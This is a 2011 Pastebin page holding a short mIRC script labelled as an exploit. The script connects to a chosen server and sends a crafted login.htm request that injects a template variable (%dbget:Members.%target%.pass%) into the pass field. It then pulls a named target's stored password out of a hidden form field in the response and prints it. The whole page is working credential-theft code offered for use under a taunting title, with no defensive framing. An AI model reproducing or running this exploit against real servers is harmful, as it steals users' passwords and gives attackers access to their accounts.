Advertisement
WraithRIOT

Now Feel Leet Noob :D

Apr 30th, 2011
316
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
mIRC 0.77 KB | None | 0 0
  1. Alias DbGet {
  2.   Set %Server.Db $$1
  3.   Set %Port.Db $$2
  4.   Set %Dumbass.Db $$3
  5.   SockClose Exploit
  6.   SockOpen Exploit %Server.Db %Port.Db
  7. }
  8. On *:SockOpen:Exploit:{
  9.   SockWrite -nt Exploit GET \login.htm?target= $+ %Dumbass.Db $+ &nick= $+ %Dumbass.Db $+ &pass=%dbget:Members.%target%.pass%
  10. }
  11. On *:SockRead:Exploit:{
  12.   SockRead %Temp
  13.   If (<input type="hidden" name="resumeopt" isin %temp) {
  14.     Set %Dumbass.Pw %Temp
  15.     Set %Dumbass.Pw $Remove($Gettok(%Dumbass.pw,7-,61),">)
  16.     Echo -a 14,1L15ogin.htm 14E15xploitation 14C15ompleted 14O15n4 %Server.Db $+ %Port.db
  17.     Echo -a 14,1T15arget4 %Dumbass.Db
  18.     Echo -a 14,1P15assword4 %Dumbass.Pw
  19.     Unset %Dumbass.*
  20.     Unset %Temp
  21.     Unset %Server.Db
  22.     Unset %Port.Db
  23.     SockClose Exploit
  24.   }
  25. }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement